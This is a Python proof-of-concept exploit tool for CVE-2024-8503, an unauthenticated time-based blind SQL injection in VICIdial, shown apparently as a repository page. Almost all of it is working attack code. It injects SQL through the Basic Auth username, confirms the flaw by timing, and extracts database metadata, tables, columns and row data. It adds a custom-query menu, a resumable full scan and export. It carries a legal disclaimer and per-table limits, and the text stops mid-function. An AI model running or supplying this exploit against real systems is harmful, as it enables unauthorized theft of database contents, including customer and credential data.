5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2024-8503-POC.py PY
#!/usr/bin/env python3
"""
VICIdial CVE-2024-8503 Proof of Concept Tool
=============================================
Unauthenticated SQL Injection in VERM_AJAX_functions.php

LEGAL DISCLAIMER:
This tool is provided for authorized security testing and educational purposes only.
Unauthorized access to computer systems is illegal. Users must obtain explicit written
permission before testing any systems they do not own. The authors assume no liability
for misuse or damage caused by this tool.

Author: Machine-Farmer
CVE: CVE-2024-8503
Date: November 2024
"""

import argparse
import requests
import time
import base64
import statistics
import sys
import json
import csv
import os
import pickle
from datetime import datetime
from typing import Optional, Dict, List, Tuple

requests.packages.urllib3.disable_warnings()

# ============================================================================
# CONFIGURATION - STRICT LIMITS FOR SECURITY
# ============================================================================

VERSION = "1.0.1"
CHAR_MIN = 32
CHAR_MAX = 126
MAX_LENGTH = 250
MAX_CELL_LENGTH = 100
BASELINE_ITERS = 4
SLEEP_MULTIPLIER = 30

# Stricter limits for PoC security
DEFAULT_ROW_LIMIT = 10
MAX_ROW_LIMIT = 10
DEFAULT_COLUMN_LIMIT = 10
MAX_COLUMN_LIMIT = 10
DEFAULT_TABLE_LIMIT = 10
# Auto-extraction limits
AUTO_COLUMN_LIMIT = 10
AUTO_ROW_LIMIT = 10

METADATA_QUERIES = {
    'db_version': '@@version',
    'database': 'DATABASE()',
    'db_user': 'CURRENT_USER()',
    'hostname': '@@hostname',
    'db_privileges': 'SELECT GROUP_CONCAT(privilege_type) FROM information_schema.user_privileges WHERE grantee LIKE CONCAT("%",SUBSTRING_INDEX(CURRENT_USER(),"@",1),"%") LIMIT 1',
    'table_count': 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()',
}

# ============================================================================
# STATE MANAGEMENT FOR RESUMABLE SCANS
# ============================================================================

class ScanState:
    """Manages scan state for resumable operations"""
    
    def __init__(self, state_file: str = ".vicidial_scan_state.json"):
        self.state_file = state_file
        self.state = {
            'target': None,
            'completed_steps': [],
            'metadata_results': {},
            'tables_list': [],
            'table_columns': {},  # table -> [columns]
            'table_data': {},     # table -> {column -> [rows]}
            'current_step': None,
            'last_updated': None
        }
        self.load_state()
    
    def load_state(self):
        """Load previous scan state if exists"""
        if os.path.exists(self.state_file):
            try:
                with open(self.state_file, 'r', encoding='utf-8') as f:
                    self.state = json.load(f)
                print(f"[+] Loaded previous scan state from {self.state_file}")
            except Exception as e:
                print(f"[!] Could not load state file: {e}")
        elif os.path.exists(".vicidial_scan_state.pkl"):
            print("[!] Legacy pickle state file found; ignoring for safety. Remove it if not needed.")
    
    def save_state(self):
        """Save current scan state"""
        self.state['last_updated'] = datetime.now().isoformat()
        try:
            with open(self.state_file, 'w', encoding='utf-8') as f:
                json.dump(self.state, f, indent=2)
        except Exception as e:
            print(f"[!] Could not save state: {e}")
    
    def clear_state(self):
        """Clear saved state"""
        if os.path.exists(self.state_file):
            os.remove(self.state_file)
        self.state = {
            'target': None,
            'completed_steps': [],
            'metadata_results': {},
            'tables_list': [],
            'table_columns': {},
            'table_data': {},
            'current_step': None,
            'last_updated': None
        }
    
    def is_step_completed(self, step: str) -> bool:
        """Check if a step was already completed"""
        return step in self.state['completed_steps']
    
    def mark_step_completed(self, step: str):
        """Mark a step as completed"""
        if step not in self.state['completed_steps']:
            self.state['completed_steps'].append(step)
        self.save_state()
    
    def update_metadata(self, key: str, value: str):
        """Update metadata results"""
        self.state['metadata_results'][key] = value
        self.save_state()
    
    def get_metadata(self, key: str) -> Optional[str]:
        """Get saved metadata"""
        return self.state['metadata_results'].get(key)
    
    def update_tables(self, tables: List[str]):
        """Update tables list"""
        self.state['tables_list'] = tables
        self.save_state()
    
    def get_tables(self) -> List[str]:
        """Get saved tables"""
        return self.state.get('tables_list', [])
    
    def update_table_columns(self, table: str, columns: List[str]):
        """Update columns for a table"""
        if 'table_columns' not in self.state:
            self.state['table_columns'] = {}
        self.state['table_columns'][table] = columns
        self.save_state()
    
    def get_table_columns(self, table: str) -> List[str]:
        """Get saved columns for table"""
        return self.state.get('table_columns', {}).get(table, [])
    
    def update_table_data(self, table: str, column: str, rows: List[str]):
        """Update row data for table/column"""
        if 'table_data' not in self.state:
            self.state['table_data'] = {}
        if table not in self.state['table_data']:
            self.state['table_data'][table] = {}
        self.state['table_data'][table][column] = rows
        self.save_state()
    
    def get_table_data(self, table: str, column: str) -> List[str]:
        """Get saved row data for table/column"""
        return self.state.get('table_data', {}).get(table, {}).get(column, [])
    
    def set_target(self, target: str):
        """Set target URL"""
        self.state['target'] = target
        self.save_state()
    
    def get_target(self) -> Optional[str]:
        """Get saved target"""
        return self.state.get('target')
    
    def show_resume_prompt(self) -> bool:
        """Show resume prompt and get user choice"""
        if not self.state.get('target'):
            return False
        
        print("\n" + "="*70)
        print("PREVIOUS SCAN DETECTED")
        print("="*70)
        print(f"Target: {self.state['target']}")
        print(f"Last Updated: {self.state.get('last_updated', 'Unknown')}")
        print(f"Completed Steps: {len(self.state['completed_steps'])}")
        if self.state['completed_steps']:
            for step in self.state['completed_steps']:
                print(f"  ✓ {step}")
        print(f"Tables Found: {len(self.state.get('tables_list', []))}")
        print(f"Tables with Columns: {len(self.state.get('table_columns', {}))}")
        print("="*70)
        
        choice = input("\nResume from previous scan? (y/n/clear): ").strip().lower()
        if choice == 'clear':
            self.clear_state()
            print("[+] Scan state cleared. Starting fresh.")
            return False
        return choice == 'y'

# ============================================================================
# NOTIFICATION SYSTEM
# ============================================================================

def send_notification(title: str, message: str):
    """Send desktop notification when scan completes"""
    try:
        if sys.platform == 'darwin':
            os.system(f"""osascript -e 'display notification "{message}" with title "{title}"'""")
        elif sys.platform == 'linux':
            os.system(f'notify-send "{title}" "{message}"')
        elif sys.platform == 'win32':
            try:
                from win10toast import ToastNotifier
                toaster = ToastNotifier()
                toaster.show_toast(title, message, duration=10)
            except ImportError:
                print('\a')
        else:
            print('\a')
    except Exception:
        print('\a')

def play_completion_sound():
    """Play a sound when scan completes"""
    try:
        print('\a')
    except Exception:
        pass

# ============================================================================
# CORE EXPLOITATION ENGINE
# ============================================================================

class SQLInjectionEngine:
    """Core engine for time-based blind SQL injection"""
    
    def __init__(self, target: str, params: dict, sleep_duration: int):
        self.target = target
        self.params = params
        self.sleep_duration = sleep_duration
        self.timing_threshold = sleep_duration * 0.8
    
    @staticmethod
    def make_auth_header(user: str, pwd: str = 'x') -> dict:
        """Create Basic Auth header with injected username"""
        cred = f"{user}:{pwd}"
        return {'Authorization': 'Basic ' + base64.b64encode(cred.encode()).decode()}
    
    def probe(self, headers: dict, timeout: int = 30) -> Tuple[Optional[float], Optional[int]]:
        """Execute single HTTP probe and measure response time"""
        try:
            start = time.perf_counter()
            r = requests.get(self.target, params=self.params, headers=headers, 
                           verify=False, timeout=timeout)
            elapsed = time.perf_counter() - start
            return elapsed, r.status_code
        except Exception:
            return None, None
    
    def test_condition(self, query: str, position: int, threshold: int) -> Optional[bool]:
        """Test if ASCII value at position is <= threshold"""
        condition = f"ASCII(SUBSTRING(({query}),{position},1))<={threshold}"
        inner_query = f"SELECT IF({condition},sleep({self.sleep_duration}),NULL)"
        payload = f"goolicker', '', ({inner_query}));#:"
        
        headers = {'User-Agent': 'KoreLogic-Test', **self.make_auth_header(payload)}
        elapsed, _ = self.probe(headers)
        
        if elapsed is None:
            return None
        return elapsed >= self.timing_threshold
    
    def extract_character(self, query: str, position: int, max_retries: int = 3) -> Optional[str]:
        """Extract single character at position using binary search with retry logic"""
        for attempt in range(max_retries):
            try:
                exists = self.test_condition(query, position, CHAR_MIN - 1)
                if exists is None:
                    if attempt < max_retries - 1:
                        print(f"\n[!] Network error at position {position}, retry {attempt + 1}/{max_retries}...")
                        time.sleep(2)
                        continue
                    raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                
                if exists:
                    return None
                
                low, high = CHAR_MIN, CHAR_MAX
                char_ord = None
                
                while low <= high:
                    mid = (low + high) // 2
                    is_lte = self.test_condition(query, position, mid)
                    
                    if is_lte is None:
                        if attempt < max_retries - 1:
                            print(f"\n[!] Network error during binary search, retry {attempt + 1}/{max_retries}...")
                            time.sleep(2)
                            break
                        raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                    
                    if is_lte:
                        char_ord = mid
                        high = mid - 1
                    else:
                        low = mid + 1
                
                if char_ord is None:
                    if attempt < max_retries - 1:
                        continue
                    return None
                
                current = self.test_condition(query, position, char_ord)
                previous = self.test_condition(query, position, char_ord - 1)
                
                if current and not previous:
                    return chr(char_ord)
                
                for ordinal in range(max(CHAR_MIN, char_ord - 2), min(CHAR_MAX, char_ord + 2) + 1):
                    curr = self.test_condition(query, position, ordinal)
                    prev = self.test_condition(query, position, ordinal - 1)
                    if curr and not prev:
                        return chr(ordinal)
                
                return None
                
            except RuntimeError as e:
                if attempt < max_retries - 1:
                    print(f"\n[!] Error: {e}, retry {attempt + 1}/{max_retries}...")
                    time.sleep(2)
                    continue
                raise
        
        return None
    
    def extract_string(self, query: str, maxlen: int = MAX_LENGTH, 
                      show_progress: bool = True) -> str:
        """Extract complete string from SQL query result"""
        result = []
        
        for pos in range(1, maxlen + 1):
            char = self.extract_character(query, pos)
            
            if char is None:
                break
            
            result.append(char)
            if show_progress:
                sys.stdout.write(char)
                sys.stdout.flush()
        
        return ''.join(result)

# ============================================================================
# VULNERABILITY SCANNER
# ============================================================================

class VulnerabilityScanner:
    """Main scanner for CVE-2024-8503"""
    
    def __init__(self, url: str, path: str):
        self.target = url.rstrip('/') + path
        self.params = {'function': 'log_custom_report'}
        self.engine = None
        self.baseline_avg = 0.0
        self.sleep_duration = 0
    
    def calibrate_timing(self, iterations: int = BASELINE_ITERS) -> bool:
        """Calibrate baseline timing and determine sleep duration"""
        print("[*] Calibrating timing baseline...")
        baseline_times = []
        
        for i in range(iterations):
            try:
                start = time.perf_counter()
                response = requests.get(self.target, params=self.params, 
                           headers={'User-Agent': 'KoreLogic-Test'}, 
                           verify=False, timeout=30)
                elapsed = time.perf_counter() - start
                baseline_times.append(elapsed)
                print(f"    Attempt {i+1}/{iterations}: {elapsed:.3f}s (Status: {response.status_code})")
                time.sleep(0.25)
            except requests.exceptions.Timeout:
                print(f"[-] Timeout on attempt {i+1}/{iterations}")
                if i < iterations - 1:
                    print("    Retrying...")
                    continue
                else:
                    print("[-] Too many timeouts during calibration")
                    return False
            except requests.exceptions.ConnectionError as e:
                print(f"[-] Connection error on attempt {i+1}/{iterations}: {e}")
                if i < iterations - 1:
                    print("    Retrying...")
                    time.sleep(1)
                    continue
                else:
                    print("[-] Could not connect to target")
                    return False
            except Exception as e:
                print(f"[-] Unexpected error during calibration: {e}")
                return False
        
        if not baseline_times:
            print("[-] No successful calibration attempts")
            return False
        
        self.baseline_avg = statistics.mean(baseline_times)
        self.sleep_duration = max(2, round(self.baseline_avg * SLEEP_MULTIPLIER))
        
        print(f"[+] Baseline: {self.baseline_avg:.3f}s | Sleep: {self.sleep_duration}s")
        return True
    
    def verify_vulnerability(self) -> bool:
        """Verify target is vulnerable"""
        print("[*] Testing vulnerability...")
        
        inj_user = f"', '', sleep({self.sleep_duration}));#:"
        headers = {
            'User-Agent': 'KoreLogic-Test',
            **SQLInjectionEngine.make_auth_header(inj_user)
        }
        
        try:
            start = time.perf_counter()
            requests.get(self.target, params=self.params, headers=headers,
                       verify=False, timeout=self.sleep_duration + 10)
            elapsed = time.perf_counter() - start
            
            if elapsed >= (self.sleep_duration * 0.8):
                print(f"[+] Vulnerability CONFIRMED (delay: {elapsed:.3f}s)")
                return True
            else:
                print(f"[-] Vulnerability NOT detected (delay: {elapsed:.3f}s)")
                return False
        except Exception as e:
            print(f"[-] Error during verification: {e}")
            return False
    
    def initialize(self, skip_vuln_check: bool = False) -> bool:
        """Initialize scanner and verify vulnerability"""
        if not self.calibrate_timing():
            return False
        
        if not skip_vuln_check:
            if not self.verify_vulnerability():
                return False
        
        self.engine = SQLInjectionEngine(self.target, self.params, self.sleep_duration)
        return True
    
    def extract_metadata(self, query_name: str, query: str) -> Optional[str]:
        """Extract metadata using SQL query"""
        if not self.engine:
            return None
        
        full_query = query if query.startswith('SELECT') else f"SELECT {query}"
        
        try:
            print(f"\n[+] Extracting: {query_name}")
            print(f"    Query: {query}")
            sys.stdout.write(f"    Value: ")
            sys.stdout.flush()
            
            result = self.engine.extract_string(full_query)
            print(f"\n    Result: {repr(result)}")
            return result
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return None
    
    def list_tables(self, limit: int = DEFAULT_TABLE_LIMIT) -> List[str]:
        """List table names from database"""
        limit = min(max(limit, 1), DEFAULT_TABLE_LIMIT)
        query = (
            "SELECT GROUP_CONCAT(table_name SEPARATOR ',') "
            "FROM (SELECT table_name FROM information_schema.tables "
            "WHERE table_schema=DATABASE() ORDER BY table_name LIMIT {limit}) AS tbls"
        ).format(limit=limit)
        
        print(f"\n[+] Listing tables (limit: {limit})...")
        sys.stdout.write("    Tables: ")
        sys.stdout.flush()
        
        try:
            tables_str = self.engine.extract_string(query)
            print("\n")
            
            if not tables_str:
                return []
            
            return tables_str.split(',')
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return []
    
    def get_table_columns(self, table: str, limit: int = DEFAULT_COLUMN_LIMIT) -> List[str]:
        """Get column names for a table"""
        if limit > MAX_COLUMN_LIMIT:
            print(f"    [!] Limit capped at {MAX_COLUMN_LIMIT} columns for PoC")
            limit = MAX_COLUMN_LIMIT
        
        query = f"SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM (SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='{table}' LIMIT {limit}) AS cols"
        
        print(f"\n[+] Getting columns for table: {table} (limit: {limit})")
        sys.stdout.write("    Columns: ")
        sys.stdout.flush()
        
        try:
            cols_str = self.engine.extract_string(query)
            print("\n")
            
            if not cols_str:
                return []
            
            return cols_str.split(',')
        except RuntimeError as e:
            print(f"\n    ERROR: {e}")
            return []
    def extract_table_data(self, table: str, columns: List[str], 
                        limit: int = DEFAULT_ROW_LIMIT, start_position: int = 0) -> List[Dict[str, str]]:
        """Extract data from table with improved error handling"""
        if limit > MAX_ROW_LIMIT:
            print(f"    [!] Row limit capped at {MAX_ROW_LIMIT} for PoC")
            limit = MAX_ROW_LIMIT
        
        print(f"\n[+] Extracting data from: {table}")
        print(f"    Columns: {', '.join(columns)}")
        print(f"    Starting from row: {start_position + 1}")
        print(f"    Rows to extract: {limit}\n")
        
        results = []
        consecutive_errors = 0
        max_consecutive_errors = 3
        
        for offset in range(limit):
            row_num = start_position + offset
            print(f"[Row {row_num + 1} (offset {offset + 1}/{limit})]")
            row_data = {}
            row_has_data = False
            
            for col in columns:
                query = f"SELECT {col} FROM {table} LIMIT {row_num},1"
                sys.stdout.write(f"  {col:.<25} ")
                sys.stdout.flush()
                
                try:
                    value = self.engine.extract_string(query, maxlen=MAX_CELL_LENGTH, show_progress=False)
                    row_data[col] = value if value else "NULL"
                    if value:
                        row_has_data = True
                    print(value if value else "NULL")
                    consecutive_errors = 0  # Reset error counter on success
                except RuntimeError as e:
                    print(f"ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    
                    if consecutive_errors >= max_consecutive_errors:
                        print(f"\n[!] Too many consecutive errors ({consecutive_errors}), stopping extraction")
                        print(f"[!] Successfully extracted {len(results)} rows before errors")
                        return results
                except KeyboardInterrupt:
                    print("\n[!] Extraction interrupted by user")
                    print(f"[!] Partial results: {len(results)} rows extracted")
                    return results
                except Exception as e:
                    print(f"UNEXPECTED ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    
                    if consecutive_errors >= max_consecutive_errors:
                        print(f"\n[!] Too many consecutive errors, stopping extraction")
                        return results
            
            # Only add row if it has some actual data
            if row_has_data or any(v not in ["NULL", "ERROR"] for v in row_data.values()):
                results.append(row_data)
            else:
                print(f"  [!] Row {row_num + 1} appears empty, may have reached end of table")
                # If we get an empty row, we might be past the end of the table
                # if row_num > start_position:  # Don't stop if it's the first row at new position
                #    break
            
            print()
        
        return results
    
    def auto_extract_table(self, table: str) -> Tuple[List[str], List[Dict[str, str]]]:
        """Automatically discover columns and extract data from table"""
        print(f"\n[+] Auto-extracting from table: {table}")
        print(f"    Step 1: Discovering columns (limit: {AUTO_COLUMN_LIMIT})...")
        
        columns = self.get_table_columns(table, AUTO_COLUMN_LIMIT)
        if not columns:
            print("[-] No columns found")
            return [], []
        
        print(f"    Found {len(columns)} columns: {', '.join(columns)}")
        print(f"    Step 2: Extracting data (limit: {AUTO_ROW_LIMIT} rows)...\n")
        
        data = self.extract_table_data(table, columns, AUTO_ROW_LIMIT)
        
        return columns, data

# ============================================================================
# OUTPUT FORMATTERS
# ============================================================================

class OutputFormatter:
    """Format and display extraction results"""
    
    @staticmethod
    def print_banner():
        """Print tool banner"""
        banner = """
╔═══════════════════════════════════════════════════════════════════════╗
║                                                                       ║
║         VICIdial CVE-2024-8503 Proof of Concept Tool                 ║
║         Unauthenticated SQL Injection Exploit                         ║
║                                                                       ║
║         Version: 1.0.1 (Secure Edition)                               ║
║         Author: Machine-Farmer                                        ║
║         For Authorized Security Testing Only                          ║
║                                                                       ║
╚═══════════════════════════════════════════════════════════════════════╝
"""
        print(banner)
    
    @staticmethod
    def print_metadata_summary(results: Dict[str, str]):
        """Print metadata extraction summary"""
        print("\n" + "="*70)
        print("METADATA EXTRACTION SUMMARY")
        print("="*70)
        
        for key, value in results.items():
            label = key.replace('_', ' ').title()
            
            if key == 'table_names' and value and value != 'ERROR':
                print(f"{label}:")
                for idx, tbl in enumerate(value.split(',')[:15], 1):
                    print(f"  {idx:2d}. {tbl}")
            else:
                display_val = value[:60] + "..." if len(value) > 60 else value
                print(f"  {label:.<25} {display_val}")
        
        print("="*70)
    
    @staticmethod
    def print_table_list(tables: List[str]):
        """Print list of tables"""
        print("\n" + "="*70)
        print(f"TABLES FOUND: {len(tables)}")
        print("="*70)
        
        for idx, table in enumerate(tables, 1):
            print(f"  {idx:2d}. {table}")
        
        print("="*70)
    
    @staticmethod
    def print_columns_list(table: str, columns: List[str]):
        """Print list of columns"""
        print("\n" + "="*70)
        print(f"COLUMNS IN TABLE: {table}")
        print("="*70)
        
        for idx, col in enumerate(columns, 1):
            print(f"  {idx:2d}. {col}")
        
        print("="*70)
    
    @staticmethod
    def print_table_data(table: str, columns: List[str], data: List[Dict[str, str]]):
        """Print extracted table data"""
        if not data:
            print("[-] No data extracted")
            return
        
        widths = {col: max(len(col), 10) for col in columns}
        for row in data:
            for col in columns:
                value = str(row.get(col, ''))
                widths[col] = max(widths[col], min(len(value), 50))
        
        total_width = sum(widths.values()) + len(columns) * 3 + 1
        
        print("\n" + "="*total_width)
        print(f"DATA FROM TABLE: {table}".center(total_width))
        print("="*total_width)
        
        header = " | ".join(col.ljust(widths[col]) for col in columns)
        print(f"| {header} |")
        print("="*total_width)
        
        for row in data:
            row_values = []
            for col in columns:
                value = str(row.get(col, 'N/A'))
                if len(value) > widths[col]:
                    value = value[:widths[col]-3] + "..."
                row_values.append(value.ljust(widths[col]))
            
            row_str = " | ".join(row_values)
            print(f"| {row_str} |")
        
        print("="*total_width)
        print(f"\nTotal rows: {len(data)}\n")
    
    @staticmethod
    def export_json(data: dict, filename: str):
        """Export results to JSON"""
        with open(filename, 'w') as f:
            json.dump(data, f, indent=2)
        print(f"[+] Results exported to: {filename}")
    
    @staticmethod
    def export_csv(columns: List[str], data: List[Dict[str, str]], filename: str):
        """Export table data to CSV"""
        with open(filename, 'w', newline='') as f:
            writer = csv.DictWriter(f, fieldnames=columns)
            writer.writeheader()
            writer.writerows(data)
        print(f"[+] Data exported to: {filename}")

# ============================================================================
# INTERACTIVE MODE
# ============================================================================

class InteractiveMode:
    """Interactive menu-driven interface"""
    
    def __init__(self, scanner: VulnerabilityScanner, scan_state: Optional[ScanState] = None):
        self.scanner = scanner
        self.scan_state = scan_state if scan_state else ScanState()
        self.metadata_queries = METADATA_QUERIES
    
    def show_main_menu(self):
        """Display main menu"""
        print("\n" + "="*70)
        print("MAIN MENU")
        print("="*70)
        print("  1. Extract Metadata")
        print("  2. List Tables")
        print("  3. Get Table Columns")
        print("  4. Extract Table Data (Manual)")
        print("  5. Auto-Extract Table Data (Discover + Extract)")
        print("  6. Custom Query")
        print("  7. Extract All (Full Scan - Resumable)")
        print("  8. View Scan State")
        print("  9. Clear Scan State")
        print("  0. Exit")
        print("="*70)
    
    def show_metadata_menu(self):
        """Display metadata extraction menu"""
        print("\n" + "="*70)
        print("METADATA EXTRACTION")
        print("="*70)
        print("  1. Database Version")
        print("  2. Database Name")
        print("  3. Database User")
        print("  4. Hostname")
        print("  5. User Privileges")
        print("  6. Table Count")
        print("  7. Extract All Metadata")
        print("  0. Back to Main Menu")
        print("="*70)
    
    def extract_metadata_interactive(self):
        """Interactive metadata extraction"""
        while True:
            self.show_metadata_menu()
            choice = input("\nSelect option: ").strip()
            
            if choice == '0':
                break
            elif choice == '1':
                result = self.scanner.extract_metadata('Database Version', self.metadata_queries['db_version'])
                if result:
                    self.scan_state.update_metadata('db_version', result)
            elif choice == '2':
                result = self.scanner.extract_metadata('Database Name', self.metadata_queries['database'])
                if result:
                    self.scan_state.update_metadata('database', result)
            elif choice == '3':
                result = self.scanner.extract_metadata('Database User', self.metadata_queries['db_user'])
                if result:
                    self.scan_state.update_metadata('db_user', result)
            elif choice == '4':
                result = self.scanner.extract_metadata('Hostname', self.metadata_queries['hostname'])
                if result:
                    self.scan_state.update_metadata('hostname', result)
            elif choice == '5':
                result = self.scanner.extract_metadata('User Privileges', self.metadata_queries['db_privileges'])
                if result:
                    self.scan_state.update_metadata('db_privileges', result)
            elif choice == '6':
                result = self.scanner.extract_metadata('Table Count', self.metadata_queries['table_count'])
                if result:
                    self.scan_state.update_metadata('table_count', result)
            elif choice == '7':
                results = {}
                for name, query in self.metadata_queries.items():
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        results[name] = result
                        self.scan_state.update_metadata(name, result)
                OutputFormatter.print_metadata_summary(results)
            else:
                print("[-] Invalid option")
    
    def list_tables_interactive(self):
        """Interactive table listing"""
        print(f"\n[+] Listing tables (limit: {DEFAULT_TABLE_LIMIT})...")
        
        tables = self.scanner.list_tables()
        if tables:
            self.scan_state.update_tables(tables)
            OutputFormatter.print_table_list(tables)
    
    def get_columns_interactive(self):
        """Interactive column discovery"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        limit_input = input(f"Number of columns to retrieve (max {MAX_COLUMN_LIMIT}) [{DEFAULT_COLUMN_LIMIT}]: ").strip()
        limit = int(limit_input) if limit_input else DEFAULT_COLUMN_LIMIT
        
        columns = self.scanner.get_table_columns(table, limit)
        if columns:
            self.scan_state.update_table_columns(table, columns)
            OutputFormatter.print_columns_list(table, columns)
    
    def extract_data_interactive(self):
        """Interactive data extraction"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        columns_str = input("Enter column names (comma-separated): ").strip()
        if not columns_str:
            print("[-] Column names required")
            return
        
        columns = [c.strip() for c in columns_str.split(',')]
        
        limit_input = input(f"Number of rows to extract (max {MAX_ROW_LIMIT}) [{DEFAULT_ROW_LIMIT}]: ").strip()
        limit = int(limit_input) if limit_input else DEFAULT_ROW_LIMIT
        
        data = self.scanner.extract_table_data(table, columns, limit)
        OutputFormatter.print_table_data(table, columns, data)
        
        export = input("\nExport to CSV? (y/n): ").strip().lower()
        if export == 'y':
            filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
            OutputFormatter.export_csv(columns, data, filename)
    
    def auto_extract_interactive(self):
        """Interactive auto-extraction"""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        
        columns, data = self.scanner.auto_extract_table(table)
        
        if columns:
            self.scan_state.update_table_columns(table, columns)
            OutputFormatter.print_table_data(table, columns, data)
            
            export = input("\nExport to CSV? (y/n): ").strip().lower()
            if export == 'y':
                filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
                OutputFormatter.export_csv(columns, data, filename)
    
    def custom_query_interactive(self):
        """Execute custom SQL query"""
        print("\n[!] Enter SQL query (SELECT only, no modifications)")
        query = input("Query: ").strip()
        
        if not query:
            print("[-] Query required")
            return
        
        if not query.upper().startswith('SELECT'):
            query = f"SELECT {query}"
        
        print(f"\n[+] Executing: {query}")
        sys.stdout.write("[+] Result: ")
        sys.stdout.flush()
        
        try:
            result = self.scanner.engine.extract_string(query)
            print(f"\n[+] {repr(result)}")
        except Exception as e:
            print(f"\n[-] Error: {e}")
    
    def view_scan_state(self):
        """View current scan state"""
        print("\n" + "="*70)
        print("CURRENT SCAN STATE")
        print("="*70)
        print(f"Target: {self.scan_state.get_target()}")
        print(f"Last Updated: {self.scan_state.state.get('last_updated', 'Never')}")
        print(f"\nCompleted Steps: {len(self.scan_state.state['completed_steps'])}")
        for step in self.scan_state.state['completed_steps']:
            print(f"  ✓ {step}")
        
        print(f"\nMetadata Collected: {len(self.scan_state.state['metadata_results'])}")
        for key, val in self.scan_state.state['metadata_results'].items():
            print(f"  • {key}: {val[:50]}...")
        
        print(f"\nTables Found: {len(self.scan_state.get_tables())}")
        print(f"Tables with Columns: {len(self.scan_state.state.get('table_columns', {}))}")
        
        print("="*70)
    
    def clear_scan_state_menu(self):
        """Clear scan state with confirmation"""
        confirm = input("\nAre you sure you want to clear all scan state? (yes/no): ").strip().lower()
        if confirm == 'yes':
            self.scan_state.clear_state()
            print("[+] Scan state cleared successfully")
        else:
            print("[+] Clear operation cancelled")
    
    def full_scan(self):
        """Perform comprehensive full scan with resumability"""
        print("\n" + "="*70)
        print("FULL SCAN - COMPREHENSIVE DATA EXTRACTION")
        print("="*70)
        print(f"This will extract:")
        print(f"  • All metadata")
        print(f"  • Tables (up to {DEFAULT_TABLE_LIMIT})")
        print(f"  • Columns for each table (up to {MAX_COLUMN_LIMIT} per table)")
        print(f"  • Rows for each column (up to {MAX_ROW_LIMIT} per table)")
        print(f"\n[!] This operation is RESUMABLE - progress is saved automatically")
        print("="*70)
        
        confirm = input("\nProceed with full scan? (y/n): ").strip().lower()
        if confirm != 'y':
            print("[+] Full scan cancelled")
            return
        
        self.scan_state.set_target(self.scanner.target)
        all_results = {
            'timestamp': datetime.now().isoformat(),
            'target': self.scanner.target,
            'metadata': {},
            'tables': {}
        }
        
        # Step 1: Extract metadata
        if not self.scan_state.is_step_completed('metadata'):
            print("\n[STEP 1/3] Extracting metadata...")
            for name, query in self.metadata_queries.items():
                cached = self.scan_state.get_metadata(name)
                if cached:
                    print(f"[+] Using cached {name}: {cached}")
                    all_results['metadata'][name] = cached
                else:
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        self.scan_state.update_metadata(name, result)
                        all_results['metadata'][name] = result
            
            self.scan_state.mark_step_completed('metadata')
            OutputFormatter.print_metadata_summary(all_results['metadata'])
        else:
            print("\n[STEP 1/3] Metadata already extracted (resuming)")
            all_results['metadata'] = self.scan_state.state['metadata_results']
        
        # Step 2: List all tables
        if not self.scan_state.is_step_completed('tables'):
            print("\n[STEP 2/3] Listing all tables...")
            tables = self.scanner.list_tables(DEFAULT_TABLE_LIMIT)
            if tables:
                self.scan_state.update_tables(tables)
                OutputFormatter.print_table_list(tables)
                self.scan_state.mark_step_completed('tables')
        else:
            print("\n[STEP 2/3] Tables already listed (resuming)")
            tables = self.scan_state.get_tables()
            print(f"[+] Using cached {len(tables)} tables")
        
        # Step 3: Extract columns and data for each table
        print(f"\n[STEP 3/3] Extracting data from {len(tables)} tables...")
        print(f"[!] Limit: {MAX_COLUMN_LIMIT} columns, {MAX_ROW_LIMIT} rows per table")
        
        for idx, table in enumerate(tables, 1):
            print(f"\n{'='*70}")
            print(f"Processing Table {idx}/{len(tables)}: {table}")
            print(f"{'='*70}")
            
            # Check if columns already extracted
            cached_columns = self.scan_state.get_table_columns(table)
            if cached_columns:
                print(f"[+] Using cached columns for {table}: {cached_columns}")
                columns = cached_columns
            else:
                columns = self.scanner.get_table_columns(table, MAX_COLUMN_LIMIT)
                if columns:
                    self.scan_state.update_table_columns(table, columns)
            
            if not columns:
                print(f"[-] No columns found for {table}, skipping...")
                continue
            
            # Extract data
            data = self.scanner.extract_table_data(table, columns, MAX_ROW_LIMIT)
            
            if data:
                all_results['tables'][table] = {
                    'columns': columns,
                    'rows': data
                }
                OutputFormatter.print_table_data(table, columns, data)
        
        # Export final results
        filename = f"full_scan_{datetime.now().strftime('%Y%m%d_%H%M%S')}.json"
        OutputFormatter.export_json(all_results, filename)
        
        print("\n" + "="*70)
        print("FULL SCAN COMPLETE")
        print("="*70)
        print(f"[+] Metadata items: {len(all_results['metadata'])}")
        print(f"[+] Tables processed: {len(all_results['tables'])}")
        print(f"[+] Results saved to: {filename}")
        print("="*70)
    
    def run(self):
        """Run interactive mode"""
        while True:
            self.show_main_menu()
            choice = input("\nSelect option: ").strip()
            
            if choice == '0':
                print("\n[+] Exiting...")
                break
            elif choice == '1':
                self.extract_metadata_interactive()
            elif choice == '2':
                self.list_tables_interactive()
            elif choice == '3':
                self.get_columns_interactive()
            elif choice == '4':
                self.extract_data_interactive()
            elif choice == '5':
                self.auto_extract_interactive()
            elif choice == '6':
                self.custom_query_interactive()
            elif choice == '7':
                self.full_scan()
            elif choice == '8':
                self.view_scan_state()
            elif choice == '9':
                self.clear_scan_state_menu()
            else:
                print("[-] Invalid option")

# ============================================================================
# COMMAND LINE INTERFACE
# ============================================================================

def parse_arguments():
    """Parse command line arguments"""
    parser = argparse.ArgumentParser(
